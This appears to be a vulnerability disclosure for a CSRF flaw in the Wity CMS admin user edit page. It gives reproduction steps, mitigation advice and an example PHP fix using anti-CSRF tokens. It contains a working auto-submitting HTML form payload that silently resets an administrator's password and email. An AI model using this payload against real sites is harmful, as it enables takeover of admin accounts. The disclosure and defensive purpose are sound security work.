Description
Hello,
I came across this CMS and looked for bugs in it. The admin user edit page is vulnerable to CSRF because the request carries no anti-CSRF token, so the server cannot tell whether a POST originated from its own form or from a third-party page. If a logged-in admin visits a page crafted by an attacker (delivered via XSS or phishing), a POST request is generated in the admin's browser and submitted to wity/admin/user/edit/1, changing the admin user's information, including the password and email address. Because the form does not ask for the current password, the attacker does not need to know it.
Once exploited, the attacker can fully take over the admin's account.
Affected URL: http://192.168.56.200/wity/admin/user/edit/1
Steps to reproduce:
- Capture the POST request sent when a user edits their information on /wity/admin/user/edit/1.
- Build a CSRF PoC based on that POST request and host it on the attacker's site:
<!-- Hidden iframe as the form target, so the server's response never replaces the visible page -->
<iframe id="test" name="test" style="display:none"></iframe>
<!-- Same field names and values as the legitimate edit form; the server checks no anti-CSRF token -->
<form action="http://192.168.56.200/wity/admin/user/edit/1" method="post" id="the_form" style="display:none" target="test">
<input type="hidden" name="id" value="1" />
<input type="hidden" name="nickname" value="admin" />
<input type="hidden" name="password" value="csrf123" />
<input type="hidden" name="password_conf" value="csrf123" />
<input type="hidden" name="email" value="csrf@test.com" />
<input type="hidden" name="groupe" value="0" />
<input type="hidden" name="type" value="all" />
<input type="submit" value="Change Password" />
</form>
<script type="text/javascript">
//<![CDATA[
// Submit automatically on page load; the victim does not need to click anything
var $form = document.getElementById('the_form');
$form.submit();
//]]>
</script>
- Get the victim (an admin with an active session) to open the CSRF PoC on the attacker's site. The victim's browser generates the POST request, attaches the session cookie, and sends it to http://192.168.56.200/wity/admin/user/edit/1
[Screenshot: visiting the attacker's site]
[Screenshot: POST request generated]
- After that, the user's information is changed to the values the attacker placed in the CSRF PoC.
Mitigation:
Require the user's current password before accepting a new one, so a forged request cannot change the password without knowledge the attacker lacks. That check alone does not stop the forged request from changing the email address, so the root cause also needs fixing: protect the edit form with an anti-CSRF token bound to the session and verified on every state-changing POST. Setting the SameSite attribute on the session cookie is a useful defense in depth against cross-site form submissions.
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet
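To illustrate both mitigations, the following is a minimal PHP handler for the edit form, written for this report as an added example; it is not Wity's own code. It issues a per-session synchronizer token, rejects any POST whose token does not match, and demands the current password before accepting a new one. The session layout, the current_user_password_hash() helper and the current_password field are assumptions; the other field names follow the PoC above.

```php
<?php
// Added example (not Wity's code): synchronizer-token CSRF protection plus a
// current-password check for a user edit handler. Persistence is stubbed out;
// field names mirror the PoC, current_password and the session layout are assumed.

session_start();

// Issue one token per session and reuse it, so several open tabs keep working.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Compare the submitted token in constant time; missing or wrong token => false.
function csrf_valid(?string $submitted): bool
{
    if (empty($_SESSION['csrf_token']) || !is_string($submitted)) {
        return false;
    }
    return hash_equals($_SESSION['csrf_token'], $submitted);
}

// Stand-in (assumption) for the stored password hash of the logged-in user.
function current_user_password_hash(): string
{
    return $_SESSION['password_hash'] ?? '';
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    // 1. Reject any POST that does not carry the token rendered into our own form.
    //    A cross-site page cannot read the token, so the forged PoC request stops here.
    if (!csrf_valid($_POST['csrf_token'] ?? null)) {
        http_response_code(403);
        exit('Invalid CSRF token');
    }

    // 2. A password change must additionally prove knowledge of the current password.
    if (($_POST['password'] ?? '') !== '') {
        if (!password_verify($_POST['current_password'] ?? '', current_user_password_hash())) {
            http_response_code(403);
            exit('Current password incorrect');
        }
        if ($_POST['password'] !== ($_POST['password_conf'] ?? null)) {
            http_response_code(400);
            exit('Password confirmation does not match');
        }
        $newHash = password_hash($_POST['password'], PASSWORD_DEFAULT);
        // ... persist $newHash for the user here
    }
    // ... persist nickname, email, groupe, type here
    exit('Profile updated');
}

// GET: render the form with the token embedded as a hidden field.
$token = htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8');
?>
<form action="/wity/admin/user/edit/1" method="post">
  <input type="hidden" name="csrf_token" value="<?= $token ?>">
  <input type="password" name="current_password" placeholder="Current password">
  <input type="password" name="password" placeholder="New password">
  <input type="password" name="password_conf" placeholder="Confirm new password">
  <input type="email" name="email">
  <input type="submit" value="Save">
</form>
```

The token check is what defeats the PoC: the attacker's page cannot read a value stored in the victim's session and rendered only into the legitimate form, so the forged POST arrives without it and is refused before any field is touched. The current-password check is the second layer, covering the case where the token is leaked or the protection is bypassed elsewhere.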